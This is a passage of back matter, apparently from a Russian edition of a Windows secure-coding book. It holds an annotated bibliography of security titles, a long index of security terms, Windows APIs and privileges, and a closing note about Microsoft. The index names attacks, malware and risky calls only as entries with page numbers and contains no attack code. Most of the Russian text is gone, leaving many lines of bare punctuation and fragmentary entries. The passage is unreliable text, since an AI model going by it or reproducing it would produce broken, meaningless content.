. 
OSI (Open Systems Interconnection).
8. Friedl, Jeffrey E. F. Mastering Regular Expressions. 2d ed. Sebastopol, CA:
OReilly & Associates, 2002.
. 
, Perl .NET Framework.
, ,
.
9. Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security.
2d ed. Sebastopol, CA: OReilly & Associates, 1996. 
, ! , 
UNIX,

. 
UNIX, 
(Department of Defense),
Rainbow Series.
10. Garfinkel, Simson, and Gene Spafford. Web Security & Commerce. Sebas
topol, CA: OReilly and Associates, 1997.
Web 
.
11. Gollmann, Dieter. Computer Security. New York: Wiley, 1999.
, Funda
mentals of Computer Security Technology. ,
, Microsoft Windows NT, UNIX
Web.
12. Grimes, Richard. Professional DCOM Programming. Birmingham, U.K.: Wrox
Press, 1997.
DCOM, , ,
.
13. Howard, Michael, et al. Designing Secure WebBased Applications for Micro
soft Windows 2000. Redmond, WA: Microsoft Press, 2000.
Web, 
. , ,
Windows 2000 .
14. LaMacchia, Brian et al. .NET Framework Security. Reading, MA: Addison
Wesley, 2000. , 
. , 
.NET.
15. Lippert, Eric. Visual Basic .NET Code Security Handbook. Birmingham, UK:
Wrox Press, 2002. .NET.
, , 
.

655

16. Maguire, Steve. Writing Solid Code. Redmond, WA: Microsoft Press, 1993.
.
, 
. ,
, 
, ,
.
, , ,
, 
.
17. McClure, Stuart, and Joel Scambray. Hacking Exposed: Windows 2000. Ber
keley, CA: Osborne/McGrawHill, 2001. Win
dows 2000 , 
. Win
dows 2000 , 
Windows, .
, Windows 2000,
, .
18. McClure, Stuart, Joel Scambray, and George Kurtz. Hacking Exposed: Net
work Security Secrets and Solutions. 2nd ed. Berkeley, CA: Osborne/McGraw
Hill, 2000. , , 
, ! 
Netware, UNIX, Windows 95/98 Windows NT.
,
. 
.
19. Menezes, Alfred J. et al. Handbook for Applied Cryptography. Boca Raton,
FL: CRC Press, 1997. , 

. 
.
20. National Research Council. Trust in Cyberspace. Edited by Fred B. Schneider.
Washington, D.C.: National Academy Press, 1999. 
, 
,
, .
21. Online Law. Edited by Thomas J. Smedinghoff. Reading, MA: AddisonWesley
Developers Press, 1996. 
, , 
, , , 
, . , 

.
22. Ryan, Peter, and Steve Schneider. Modelling and Analysis of Security Proto
cols. London, England: Pearson Education Ltd, 2001.
, .

656

, 

. ,
.
23. Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source
Code in C. 2d ed. New York: Wiley, 1996. ,
. , :)?
24. Security Protocols. Edited by Bruce Christianson, et al. Berlin: Springer, 1998.
, 
. :
,
.
25. Shimomura, Tsutomu, and John Markoff. Takedown: The Pursuit and Cap
ture of Kevin Mitnick, Americas Most Wanted Computer OutlawBy the
Man Who Did It. New York: Hyperion, 1996.
, 
Well, Sun Microsystems . ,
The Cuckoos Egg, , , .
26. Solomon, David A., and Mark Russinovich. Inside Microsoft Windows 2000.
Redmond, WA: Microsoft Press, 2000. 
Inside Windows NT.
, ,
, 
. Windows NT 1993 .
SDK ()
. 
( , 
, , 
), , ,
.*
27. Stallings, William. Practical Cryptography for Data Internetworks. Los
Alamitos, CA: IEEE Computer Society Press, 1996. 
. ,
.

, , DES, IDEA,
SkipJack, RC5, , , 
, SNMP, .
28. Stallings, William. Cryptography and Network Security: Principles and
Practice. Englewood Cliffs, NJ: Prentice Hall, 1999. 
,
, , S/MIME, SET, SSL/TLS, IPSec,

* : . ., Microsoft
Windows 2000. . .: ; .: 
, 2001.

657

PGP Kerberos. ,
Applied Cryptography: Protocols, Algorithms, and Source Code in C, 

.
29. Stevens, W. Richard. TCP/IP Illustrated, Volume 1: The Protocols. Reading,
MA: Addison Wesley, 1994. ,
IP. , 
. , 
.
30. Stoll, Clifford. The Cuckoos Egg. London: Pan Macmillan, 1991. 
, , , 
,
, . 
.
31. Summers, Rita C. Secure Computing: Threats and Safeguards. New York:
McGrawHill, 1997. , , 

. ,
.
32. The Unicode Consortium. The Unicode Standard, Version 3.0. Reading, MA:
AddisonWesley, 2000. ( www.uni
code.org.) , ,
, ! , 
, Unicode
.
33. Viega, John and McGraw Gary. Building Secure Software. Reading, MA: Addi
sonWesley, 2001. UNIX ,
. , 
UNIX, . 
Windows.
!
34. Whittaker, James A. How to Break Software: A Practical Guide to Testing.
Reading, MA: AddisonWesley, 2002.
. ,
, .
, 
.
35. Zwicky, Elizabeth, et al. Building Internet Firewalls. 2d ed. Sebastopol, CA:
OReilly & Associates, 2000. ,
,
. , ,
. Windows
, .


3
3DES 243, 247
3DES (TripleDES)

290

A
access control entry . ACE
Access Control List . ACL
ACE (access control entry) 98,147,
151, 153, 154, 155, 159, 160, 164,
166, 169, 180
ACK 398
ACL (Access Control List) 49, 97, 98,
147, 149, 150, 152, 153, 154, 155,
166, 170, 187, 188, 190, 262, 296,
317
ACE 164
ACE 164
155
Active Server Pages . ASP
Active Template Library . ATL
ActiveX 440, 441, 442, 443
activity diagram . ,

Advanced Encryption Standard


. AES
AES (Advanced Encryption
Standard) 243
Affected users . ,
,

ANSI 130, 132, 374


API 100, 189, 192, 390
. DPAPI
AppID (application ID) 437
ASP (Active Server Pages) 324
ATL (Active Template Library) 155,
162

B
Back Orifice 179
Basic authentication
. ,
bind .
bit flip . ,

blanket . ,
.
bug .

C
C Runtime . CRT
canonicalization .

CAPICOM 242, 254
Cartesian join .

CAS (Code Access Security) 464, 466


checkin . ,

chokepoint .
Cipher 234
loaking .
CLR (Common Language Runtime)
171, 254, 282, 463, 472
Code Access Security . CAS
code diffs . ,
code point .
COM (Component Object
Model) 411, 440
COM Internet Services
. COM
COM+ 172
combining character .

command shell .

Common Language Runtime . CLR


Component Object Model . COM
COM 432
connectable object .

connection point .

control flow graph .



cookie 357, 359, 365, 374,
375
credential .
crosssite scripting (XSS) . ,


659

CRT (C Runtime) 223


Crucial ADS 317
CryptoAPI (Cryptographic API) 100,
237, 241, 243, 244, 247, 254, 262
CSP (Cryptographic Service Provider)
228

D
DACL (Discretionary Access Control
List) 147, 151, 158, 160, 169, 180,
398
167, 169
Damage potential . ,

Data Encryption Standard . DES,
. DES
data flow diagrams . DFD
data fork . ,
Data Protection API . DPAPI
DCE (Distributed Computing
Environment) 411
DCOM (Distributed COM) 99, 103,
257, 411, 432, 434, 435, 436
DDoS (distributed denial of service)
. , ,

dead code . ,
dead store elimination .

declarative permission
. ,
defacement . ,
Web
Denial of Service (DoS) . ,

DES (Data Encryption Standard) 23,
231, 243, 244, 247
DFD (data flow diagrams) 64, 75,
82, 83
DHTML (Dynamic HTML) 357
dictionary attack . ,

Digest authentication . 
,
digest function . ,

Discoverability . ,

Discretionary Access Control List
. DACL

Distributed COM . DCOM


Distributed Computing
Environment . DCE
DLL 372
DNS 55, 86, 98, 173, 338
DNS cache poisoning . 
,
DNS
DNS spoofing . ,
DNS
DoS (Denial of Service) . ,

dotless IP address . IP,

dottedIP address . IP,

DPAPI (Data Protection API) 191,
262, 263, 268, 283
Dynamic HTML . DHTML

E
EFS (Encrypting File System) 99
Elevation of privilege . ,

Encrypting File System . EFS
ephemeral . ,
exception handler clobbering
. ,

Exploitability . ,

F
factoring . ,

FAT 290
fault tree . 

FileMon 217
filtering .
fork .
FTP 154
FxCop 466

G
GAC (global assembly cache)
GNU C 279

469

660

H
hard link . ,
hash function . ,
HashBased Message Authentication
Code . HMAC
heap overflow . ,

HFS 323
HFS+ (Hierarchical File System
Plus) 314
HMAC (HashBased Message
Authentication Code) 250
honeypot .
HTML 58, 359, 363, 364
HTTP (Hypertext transfer
protocol) 5, 77, 154, 355, 371
HTTPS 96
Hypertext transfer protocol
. HTTP

I
I18N 378, 380
IAS (Internet Authentication
Service) 97
ICMP (Internet Control Message
Protocol) 462
ID 125

125, 391, 448
125
IDEA 243
IETF (Internet Engineering Task
Force) 99
IIS (Internet Information Services) 5,
95, 98, 132, 154, 173, 179, 317,
321, 324, 364, 485
IMAP (Internet Message Access
Protocol) 94
imperative permission
. ,
impersonation .
index out of range . ,

Information disclosure
. ,

Internet Authentication Service


. IAS
Internet Control Message
Protocol . ICMP

Internet Engineering Task Force


. IETF
Internet Information Services . IIS
Internet Message Access Protocol
. IMAP
Internet Printing Protocol . IPP
Internet Protocol Security . IPSec
Internet Protocol version 4 . IPv4
Internet Protocol version 6 . IPv6
Internet Server Application
Programming Interface . ISAPI
IP restriction . IP
IPP (Internet Printing Protocol) 132,
179, 180
IPSec (Internet Protocol
Security) 54, 93, 94, 99, 102, 240,
257, 409
IPv4 (Internet Protocol version
4) 391
IPv6 (Internet Protocol version
6) 390, 409, 460
IP 338
322
322
IP 97, 98, 170, 173
ISAPI (Internet Server Application
Programming Interface) 48, 132,
179, 337, 372, 374

J
JavaScript 58
JIT 477
JScript 242, 329

K
Kerberos 23, 92, 95, 419, 420
keyed hash .

L
LAN Manager 54
LDAP 94, 97
linear congruential function
. ,

Local Security Authority . LSA


logging .
LSA (Local Security Authority) 184,
187, 189, 264, 268, 283, 459
luring atack . ,

M
MAC (message authentication code)
92, 99, 100, 249, 253, 374
mailslot .
malware .
maninthemiddle . ,

marsalling .
maximum segment lifetime . MSL
message authentication code
. MAC
MFC (Microsoft Foundation
Classes) 140
Microsoft Interface Definition
Language . MIDL
Microsoft JScript 152
Microsoft Transaction Server 435
Microsoft Visual Basic Scripting
Edition . VBScript
MIDL (Microsoft Interface Definition
Language) 416
MSDOS 314
MSL (maximum segment
lifetime) 399
mutex .

N
named pipe . ,

Napster 313
National Language Support . NLS
Negotiate 95
NetBIOS 97, 322, 460
NLS (National Language
Support) 378
NT LAN Manager . NTLM
NTFS 317
NTLM (NT LAN Manager) 93, 95, 96,
419, 420
NULL DACL . DACL,

O
OBJREF (object reference)
.
offbyone error . ,


ONC (Open Network
Computing) 411

661

Open Software Foundation RPC


. OSF RPC
OpenSSH 53
OSF RPC (Open Software Foundation
RPC) 412
owner .

P
parameterized command
.
PasswordBased Key Derivation
Function #1 . PBKDF1
patch .
PBKDF1 (PasswordBased Key
Derivation Function #1) 261
PGP (Pretty Good Privacy) 103
Ping of Death . , ping

PKCS #5 (PublicKey Cryptography


Standard) 261
placeholder .

plugin .
pointer subterfuge . ,

poisoning .
POP3 (Post Office Protocol 3) 94
port scanning .

Portable Operating System Interface


for UNIX . POSIX
POSIX (Portable Operating System
Interface for UNIX) 319
Post Office Protocol 3 . POP3
Pretty Good Privacy . PGP
principal .

promiscuous mode . ,

protocol sequences
.

PublicKey Cryptography
Standard . PKCS #5

Q
QoS (quality of service)
.

662

R
RADIUS (Remote Administration Dial
In User Service) 93, 97
RC4 243
register attack . ,
Regmon 217
regression bug .

Remote Administration DialIn User


Service . RADIUS
Remote Desktop .

Remote Procedure Call . RPC
Reproducibility . ,

Repudiation . ,

resource fork . ,
restricted token . ,

restricting SID . SID,

reverse engineering .

RivestShamirAdleman . RSA
RPC(Remote Procedure Call) 48, 99,
103, 257, 411, 412, 413, 415, 416,
421, 424, 428, 429
48

461
412
RPC endpoint mapping service
. RPC,

RPC runtime . RPC,

RSA (RivestShamirAdleman) 22, 23,


235, 243

S
S/MIME (Secure/Multipurpose
Internet Mail Extensions) 103
SACL (System Access Control List)
151, 158, 160, 267
safe for initialization (SFI) . ,
,

safe for scripting (SFS) . ,


,

salt .
SAM (Security Account Manager)
318, 339
Schannel 95
SCM (Service Control Manager) 187
script .
SDDL (Security Descriptor Definition
Language) 159162
Secure Sockets Layer . SSL
Secure/Multipurpose Internet Mail
Extensions . S/MIME
SecureIIS 321
Security Account Manager . SAM
Security Configuration Editor
.

security descriptor .

Security Descriptor Definition


Language . SDDL
Security Expressions 317
security ID . SID
Security Support Provider . SSP
Security Support Provider
Interface . SSPI
seed value .

serializing .
server hijacking . ,

Server Message Block . SMB


Service Control Manager . SCM
service principal name . SPN,
. SPN
SFI (safe for initialization) . ,
,

SFS (safe for scripting) . ,


,

SID (security ID) 151, 158, 159, 161,


162, 163, 166, 180, 186, 187, 188,
193, 197, 214
denyonly . ,

205
201

signed integer . ID,

Simple Mail Transfer Protocol


. SMTP
single point of failure .

SMB (Server Message Block) 54, 460
SMS (Systems Management
Server) 436
SMTP (Simple Mail Transfer
Protocol) 94, 474
sniffer .
social engineering . ,

socket .
SPN (service principal name) 96,
418
Spoofing identity . ,

SQL injection . SQL

SSL (Secure Socket Layer) 57, 94, 95,


96, 99, 102, 225, 257, 355, 375, 390
SSP (Security Support Provider) 95
SSPI (Security Support Provider
Interface) 95, 265, 390
stack smashing . ,

stack walk .
stackbased cookie .
cookie
StackGuard 118, 144
STL (Standard Template
Library) 139, 310
stream cipher . ,

Streams 317
strict handle .
,
Strings 234
strong named assembly .

SubSeven 179
superuser .
surrogate pair .
symbolic link (symlink) . ,

SYN flood .
SYN
System Access Control List . SACL

663

system entropy .

Systems Management Server . SMS

T
Tampering with data . ,

TCB (Trusted Computing Base) 185
TCP (Transmission Control
Protocol) 10, 390, 391, 404
TCP/IP 54, 99, 390
Terminal Server .

threat model . ,
threat target .

threat tree . ,
throttling .

TLS (Transport Layer Security) 57,
94, 95, 96, 99, 102, 257, 355, 375,
390
token .
TransactSQL 349
Transmission Control Protocol
. TCP
Transport Layer Security . TLS
truncation error . ,

Trusted Computing Base . TCB
trustworthy computing .

U
UDP 390, 391, 408, 462
UDP bomb . , UDP
UID (User ID) 125
UML (Unified Modeling
Language) 64, 153
UNC (Universal Naming
Convention) 319
Unicode 130, 132, 304, 327, 374,
377, 378, 380, 386, 387
Unified Modeling Language . UML
Universal Naming Convention
. UNC
unsigned short . ID,

UPN (user principal name) 339

664

usability . ,

USB 472
User ID . UID
user principal name . UPN
UTF8 325, 326, 378
UTF16 378
UTF32 378

V
VBScript (Microsoft Visual Basic
Scripting Edition) 152, 231, 309,
329
VTable hijacking . ,
VTable

W
waterfall approach .
,
Web 355
Webbased Distributed Authoring and
Versioning . WebDAV
WebDAV (Webbased Distributed
Authoring and Versioning) 320
window station .

Windows Scripting Host . WSH


Windows Sockets . Winsock,
. Winsock
Winsock (Windows Sockets) 339, 399
wrappers . ,
WSH (Windows Scripting Host) 299
WTLS 102

X
XML 481
XOR 242, 243, 244, 290
XSLT (XSL Transformation) 485
XSS (crosssite scripting) . ,


Z
zeroday attack

. ,

92, 97

. RSA

74
DoS 417
DS (Denial of Service) 186
JScript 369
ping 448
UDP 447
259
SQL 344

144
328
VTable 144

144
 294,
298, 355, 359, 360, 368, 480

328
144
258
89
45, 72, 92,
447
72
248
144
144
398

185
391
239, 357,
371
54, 96
144
178
232
477
Web
178

353
353
100, 169
261
92, 93, 417
IPSec 93, 94, 97
Kerberos 94
Kerberos v5 93, 96
Microsoft Passport 93, 94, 95
NTLM 93, 94, 96

665

RADIUS 93, 94, 97


71, 91, 93, 94
93, 94, 95
71, 93, 94
X.509 93, 94, 96
Windows 93, 95

.
ACE
58
. CAS

3

227
361

55

Microsoft Visual C++ 7 . CRT

226
405
74, 80, 179, 314, 321, 323,
362, 366, 412

323
323
323
178
FunLove 179
ILoveYou 179
W32.Bolzano 179
186
178

223
. GAC

85
483

79
74
487
156,
158, 168, 169

278

64
. DFD

. LSA
. SCM
6

192
100
55

. ID
. SID

202
. UID
. AppID

. DACL, . DACL
441
COM 193
ICommandWithParameters 349
IDispatch 441
IDisposable 290
IHttpModule 94
IObjectSafety 444
IPersist 441
ISecurityExample 438
ISerializable 483
IUnknown 441
UsbFileStream 472
398

HttpRequestValidationException
367
PolicyException 470
SecurityException 476

48, 151, 320


101

BadStringBuf 122
CAtlRegExp 310

666

CcryptRandom 228
CCryptRandom 228
CString 140
DataProtection 286
ErasableData 288
FileIOPermission 474
FileStream 485
FormsAuthenticationModule 94
PassportAuthenticationModule 95
Password 290
PrincipalPermission 171
RNGCryptoServiceProvider 230
SecurityPermission 474
SqlCommand 349
string 140
System.IO.File 476
UserInput 310
479
222, 250
3DES 235
DSA 236
RSA 235
235
235
235
100, 235, 237
235
236
239
100, 235
235
237
235, 237
231
234
223, 261
237
235
237


. MAC

441

441
36
44

479
277

283
36
37
288, 463
HTML 328

325
378
348
110

. NLS
139
434
92
99
(
) 296

. CSP
222
258
111, 118


. SAM


. MSL
186, 187, 188, 197, 214
199
187, 199, 201,
203, 464
222
414
154, 170
438

Assert 472, 473, 474, 476


Canonicalize 311
Clear 290
Demand 469, 473, 476
Deny 476
Dispose 290
GetRandom 230, 231
GetServerBlanket 438, 439
GetStringTypeEx 386
GetUnicodeCategory 386
HttpServerUtility.HTMLEncode 362

IclientSecurity::SetBlanket 439
Idispatch::Invoke 440
InheritanceDemand 480
Init 311
IsCallerInRole 172
Iunknown::AddRef 433
LinkDemand 476, 477
MyWin32Funtion 478
PermitOnly 476
Print 442
Release 433
Server.HTMLEncode 362
SetKey 480
Validate 311

. RPC

21
21
247, 259, 261
151, 170

437
439
83

. CLR

document.cookie 357
FileSystemObject 152
IAccessControl 437
IserverSecurity 439
PrincipalPermission 171
RegExp 309
SqlConnection 352
Utilities 230
71, 74, 78, 84, 85, 86
440

101
435
214
74
DoS 72
DREAD 79, 81, 90
STRIDE 71, 81, 101
73, 74, 77, 79, 81, 87, 88,
89
84, 85, 86
79, 92, 102

667

61, 78, 90
60

72, 92, 258
DNS 72
78
72, 92

73, 92
DNS 72
71,
92, 258
72,
75, 92

258
90
78
79

msize 141
sizeof 141
415, 425
426
422
236

. UPN
. SPN,
. SPN
357

Unicode 132
125

116
123
79

125
10
16

SYN 404
108, 112, 125, 132, 372,
378
118
109
357

668

(detached)
254

414, 431

67
244

131, 313, 321, 329
97, 98, 101, 180, 187,
197
Bypass Traverse hecking 206
SeAssignPrimaryTokenPrivilege
185, 187, 193, 210, 213
SeAuditPrivilege 213
SeBackupPrivilege 181, 184, 192,
213
SeChangeNotifyPrivilege 186, 203,
211, 214
SeCreatePagefilePrivilege 210, 213
SeCreatePermanentPrivilege 210,
213
SeCreateTokenPrivilege 213
SeDebugPrivilege 184, 193, 210,
213, 258
SeEnableDelegationPrivilege 214
SeImpersonatePrivilege 214
SeIncreaseBasePriorityPrivilege
210, 213
SeIncreaseQuotaPrivilege 185,
193, 210, 213
SeIncreasQuotaPrivilege 187
SeLoadDriverPrivilege 185, 210,
213
SeLockMemoryPrivilege 193, 210,
213
SeMachineAccountPrivilege 193,
213
SeManageVolumePrivilege 210
SeProfileSingleProcessPrivilege 210,
213
SeRemoteShutdownPrivilege 186,
192, 214
SeRestorePrivilege 184, 213
SeSecurityPrivilege 192, 193, 210,
213
SeShutdownPrivilege 192, 210, 213
SeSyncAgentPrivilege 214
SeSystemEnvironmentPrivilege
210, 213
SeSystemProfilePrivilege 213

SeSystemtimePrivilege 193, 210,


213
SeTakeOwnershipPrivilege 186,
210, 213
SeTcbPrivilege 185, 192, 212, 213
SeUndockPrivilege 210, 214
199
181
177, 215
191
188
201
414

71
64
20
4

RegularExpressions 301
System.EnterpriseServices 287, 288
System.Net 376
System.Runtime.InteropServices
283
System.Runtime.Serialization 487
System.Security.Cryptography 243,
463
System.Security.Cryptography.X509
Certificates 254
System.Text.RegularExpressions
308, 352
System.Xml.Xsl 485

. HTTP
. IPP
470

470
EmailAlertPermission 473, 474
EnvironmentPermission 480
FileIOPermission 470, 471, 473,
485
PasswordPermission 477
PrivateKeyPermission 480
ReflectionPermission 476
RequestMinimum 470
SerializationFormatter 487
SocketPermission 474
UnmanagedCode 474
471

669

471
97, 98
304, 308,
309, 310, 330, 331, 370

162
(
) 75, 76
93
78, 84, 85, 86
80
80
,
80
79
80
79
89
170, 171, 172, 173

469
287, 467
481

document.cookie 364
innerHTML 364
innerText 362, 363
location.href 360
location.search 360
SecurityPermissionFlag.Assertion
473
155, 166
483, 487
75
348
11

. SACL
5
 96

Application_OnPreSendRequest
Headers 365
onactivate 359
onclick 363
onload 359
onmouseover 359
189, 390
380


. AL

314
438
314
cookie 278
11, 125
380
4, 10

51
440
170, 174
( )
179

178,

278

. RPC
166


. UNC
180, 188
308
125
93, 171,
180

92, 100

accept 400
AddAccessAllowedACE 166
AddAccessAllowedAceEx 166
AddAccessAllowedACEEx 166
AddAccessAllowedObjectAce 166
AllocateUserPhysicalPages 193,
281
BadFunc 121
bind 391
BroadcastSystemMessage[Ex] 192
close 398
CloseFileByID 427
closesocket 401
CoInitializeSecurity 435, 437, 438

670

CompareString 381, 385


ConnectionString 352
CopyData 295
CreateFile 181, 192, 318, 320,
335, 381
CreatePrivateObjectSecurityEx 193
CreateProcessA 379
CreateProcessAsUser 187, 193, 203
CreateProcessW 379
CreateRemoteThread 184
CreateRestictedToken 201
CreateWellKnownSid 164
CryptAcquireContext 228
CryptDeriveKey 262
CryptExportKey 237
CryptGenKey 237
CryptGenRandom 225, 228, 230,
267, 271, 360
CryptGetHashParam 260
CryptImportKey 237
CryptProtecData 263
CryptProtectData 262, 263
CryptProtectMemory 280
CryptReleaseContext 228
CryptUnprotectData 262
CryptUnprotectMemory 280
DatabaseConnect 277
DebugActiveProcess 193
DoThreadWork 206
DsMakeSPN 420
EnterCriticalSection 459
eval 371
ExitWindowsEx 192
fgets 140
FoldString 387
getaddrinfo 339
GetAllSIDs 197
GetExchangeKey 239
GetFileSecurity 192
GetFileType 332
GetFullPathName 332
GetKey 236
GetKeyHandle 236
GetLongPathName 332
GetNamedSecurityInfo 164
GetPrivs 197
gets 140
GetSecurityInfo 164
GetServerVariable 132, 372
GetTickCount 455, 457
GetUser 197

GetUserNameEx 340
GetVersionEx 210
GetVolumeInformation 152
HandleInput_Strncpy2 137
HeapAlloc 276
HeapCreate 276
HeapSize 276
HttpRequest.Cookies 367
HttpRequest.Form 367
HttpRequest.QueryString 367
ImpersonateLoggedOnUser 203
inet_ntoa 140
InitializeCriticalSection 459
InitiateSystemShutdown[Ex] 192
IsBadExtension 299
IsNLSDefinedString 380, 381
IsTokenResticted 205
LCMapString 379, 381
LogonUser 95, 185, 192
LsaLookupSids 412
LsaRetrievePrivateData 189, 264,
268
LsaStorePrivateData 189, 264, 268
lstrcat 133
lstrcpy 133
lstrcpyn 133, 135
main 117, 121, 455
malloc 111, 169
Message 420
MultiByteToWideChar 131, 336,
378, 381, 382
NetJoinDomain 193
NetLocalGroupDel 193
NetUserAdd 193
OpenEventLog 192
OpenFileByID 427
OpenIDFile 427
OpenProcessToken 197
PostMessage 192
PrinterOperations 425
printf 111
PrintMessage 128
PrivilegeCheck 200
quotename 349
rand 223
ReadFileByID 427
ReadProcessMemory 193
RegisterLogonProcess 192
RegQueryValueEx 148, 150
RevertToSelf 200
RpcBindingInqAuthClient 419, 420

671

RpcBindingSetAuthInfo 417, 418,


420
RpcBindingSetAuthInfoEx 427
RpcBindingToStringBinding 430
RpcEpRegister 431
RpcImpersonateClient 427
RpcServerRegisterAuthInfo 419
RpcServerRegisterIf2 428
RpcServerRegisterIfEx 428
RpcStringBindingCompose 415
RpcStringBindingParse 430
_snprintf 138, 139
SaferComputeTokenFromLevel 207
SendMessage 192
SetEntriesInAcl 164
SetFileSecurity 159
SetNamedSecurityInfo 159, 164
SetSecurityDescriptorDacl 158
SetSecurityDescriptorGroup 158
SetSecurityDescriptorOwner 158
SetSecurityDescriptorSacl 158
SetSecurityInfo 164
setsockport 401
SetSystemPowerState 192
SetSystemTime 193
SetThreadToken 203
SetTokenInformation 192
shutdown 397
sizeof 116
sprintf 137
SprintfLogError 137
SQLBindParam 349
SQLNumParams 349
StrCat 133
strcpy 133, 135
StrCpy 133
StrCpyN 133
StringCchCat 143
StripBackslash1 455, 458
StripBackslash2 455, 458
StripBackslash3 455
strncpy 116, 135
TerminateProcess 184
ThreadFunc 206
UseFile(ctxAttacker) 424
VirtualLock 193, 281, 282

WideCharToMultiByte 378, 381, 382


WSAAccept 401, 404
99, 259
241
223
193
142
99, 259

92
249, 250

99
346
sp_executesql 350
sp_GetName 346
utl_file 348
xp_cmdshell 348

259


253

92, 100, 249

92, 99
243
244
243, 244
243

. EFS

225
37


. UML

. SDDL
320



,

Secure Windows Initia
tive, , 
, 
,
. 

Microsoft.
. , ,
Mic
rosoft, , .


, , 
Security Stra
tegies Microsoft, 
Microsoft.


Microsoft.
Microsoft ,
Windows NT 
Internet Scanner Internet Security
System. 1998 .

. ,
, ,
, ,
.
, , , , ,
, , . 
,
.